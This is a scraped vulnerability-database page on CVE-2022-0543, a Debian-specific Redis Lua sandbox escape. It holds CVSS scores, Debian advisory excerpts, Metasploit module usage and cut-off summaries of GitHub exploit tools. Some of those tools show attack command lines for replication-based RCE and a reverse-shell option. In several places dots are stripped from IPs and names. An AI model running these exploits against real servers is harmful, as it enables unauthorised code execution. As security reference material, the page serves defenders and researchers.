Published: 18/02/2022 Updated: 29/09/2023

CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10

CVSS v3 Base Score: 10 | Impact Score: 6 | Exploitability Score: 3.9

VMScore: 1000

Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

It exists, that redis, a persistent key-value database, due to a packaging issue, is prone to a (Debian-specific) Lua sandbox escape, which could result in remote code execution.

Vulnerable Product	Search on Vulmon	Subscribe to Product
redis redis -

Debian Bug report logs - #1005787 redis: CVE-2022-0543 Package: redis; Maintainer for redis is Chris Lamb <lamby@debianorg>; Source for redis is src:redis (PTS, buildd, popcon) Reported by: "Chris Lamb" <lamby@debianorg> Date: Mon, 14 Feb 2022 22:39:02 UTC Severity: grave Tags: security Found in versions redis/5: ...

Reginaldo Silva discovered a (Debian-specific) Lua sandbox escape in Redis, a persistent key-value database For the oldstable distribution (buster), this problem has been fixed in version 5:5014-1+deb10u2 For the stable distribution (bullseye), this problem has been fixed in version 5:6016-1+deb11u2 We recommend that you upgrade your redis p ...

This Metasploit module exploits CVE-2022-0543, a Lua-based Redis sandbox escape The vulnerability was introduced by Debian and Ubuntu Redis packages that insufficiently sanitized the Lua environment The maintainers failed to disable the package interface, allowing attackers to load arbitrary libraries On a typical redis deployment (not docker), ...

This module exploits CVE-2022-0543, a Lua-based Redis sandbox escape The vulnerability was introduced by Debian and Ubuntu Redis packages that insufficiently sanitized the Lua environment The maintainers failed to disable the package interface, allowing attackers to load arbitrary libraries On a typical ` ...

This module exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The vulnerability was introduced by Debian and Ubuntu Redis packages that insufficiently sanitized the Lua environment. The maintainers failed to disable the package interface, allowing attackers to load arbitrary libraries. On a typical `redis` deployment (not docker), this module achieves execution as the `redis` user. Debian/Ubuntu packages run Redis using systemd with the "MemoryDenyWriteExecute" permission, which limits some of what an attacker can do. For example, staged meterpreter will fail when attempting to use mprotect. As such, stageless meterpreter is the preferred payload. Redis can be configured with authentication or not. This module will work with either configuration (provided you provide the correct authentication details). This vulnerability could theoretically be exploited across a few architectures: i386, arm, ppc, etc. However, the module only supports x86_64, which is likely to be the most popular version.

msf > use exploit/linux/redis/redis_debian_sandbox_escape
msf exploit(redis_debian_sandbox_escape) > show targets
    ...targets...
msf exploit(redis_debian_sandbox_escape) > set TARGET < target-id >
msf exploit(redis_debian_sandbox_escape) > show options
    ...show and set options...
msf exploit(redis_debian_sandbox_escape) > exploit

Shared HTB Une box Linux de difficulté Medium créée par Nauten qui nous amènera à récupérer, grâce à une injection SQL, le hash du mot de passe d'un utilisateur dans la base de données derrière un site Prestashop Puis elle nous permettra de compromettre un deuxième utilisateur en exploitan

Zscan a scan blasting tool set

Zscan a scan blasting tool set 📄English document 更新内容见日志log 结果输出格式 -输出的部分结果截图，分两个阶段，第一阶段是扫描过程中的输出，从主机存活探测结束开始，第二个阶段是将所有扫描的结果做整理，从输出port result list开始简介🎉 Zscan是一个开源的内网端口扫描器、�

CVE-2022-0543_RCE,Redis Lua沙盒绕过命令执行

CVE-2022-0543 CVE-2022-0543_RCE,Redis Lua沙盒绕过命令执行 Usage python3 CVE-2022-0543py

Redis RCE through Lua Sandbox Escape vulnerability

CVE-2022-0543 Fully featured exploit for Redis RCE through Lua Sandbox Escape vulnerability Based on thesecmastercom/how-to-fix-cve-2022-0543-a-critical-lua-sandbox-escape-vulnerability-in-redis/ Features: Automatic reverse shell (-I + -P) Single command execution (-x) Basic shell (Default) TO DO: Need better checks to prevent false-positives DISCLAIMER: This scr

redis未授权、redis_CVE-2022-0543检测利用二合一脚本

redisHack redis未授权、redis_CVE-2022-0543检测利用二合一脚本使用方法：

一款用Go语言编写的数据库自动化提权工具，支持Mysql、MSSQL、Postgresql、Oracle、Redis数据库提权、命令执行、爆破以及ssh连接

Redis 连接redis获取sql shell go run \maingo -redis -rhost 192168111211 -rport 6379 -cli 主从复制RCE //Linux go run \maingo -redis -rhost 192168111211 -lhost 1921681110 -exec -so expso go run \maingo -redis -rhost 192168111211 -lhost 1921681110 -exec -console -so expso

Redis primary/secondary replication RCE

Redis primary/secondary replication RCE redis主从复制rce的go版本，可独立编译使用，并集成在在zscan的exploit的redis利用模块中顺便添加了CVE-2022-0543 Redis Lua 沙盒逃逸 RCE，开箱即用使用方式 Usage of /redis-rce: -dstpath string set target path（上传文件模式中的目标路径） -exec use execute the comman

Redis 沙盒逃逸（CVE-2022-0543）POC&EXP

CVE-2022-0543 1简介 Redis 沙盒逃逸漏洞（CVE-2022-0543）POC&EXP 2用法 RedisRCE -help (查看帮助信息) RedisRCE -h 1921680100:6379 (无密码连接) //输入q退出程序 RedisRCE -h 1921680100:6379 -p 123456 (密码连接) 3免责声明此工具仅用于学习、研究和自查。不应用于非法目�

CVE-2022-0543_RCE,Redis Lua沙盒绕过命令执行

CVE-2022-0543 CVE-2022-0543_RCE,Redis Lua沙盒绕过命令执行 Usage python3 CVE-2022-0543py

Redis 漏洞利用工具

Redis 漏洞利用工具声明本工具仅用于个人安全研究学习。由于传播、利用本工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，工具作者不为此承担任何责任。注意主从复制会清空数据，主从复制会清空数据，主从复制会清空数据，请注意使用！请注意使用！请注意

CWE-862 https://bugs.debian.org/1005787 https://www.debian.org/security/2022/dsa-5081 https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce https://lists.debian.org/debian-security-announce/2022/msg00048.html https://security.netapp.com/advisory/ntap-20220331-0004/http://packetstormsecurity.com/files/166885/Redis-Lua-Sandbox-Escape.html https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1005787 https://nvd.nist.gov https://github.com/zyylhn/zscan https://www.debian.org/security/2022/dsa-5081

CVE-2022-0543

Vulnerability Summary

Vulnerability Trend

Vendor Advisories

Exploits

Metasploit Modules

Github Repositories

References

Vulmon Search

About

Products

Connect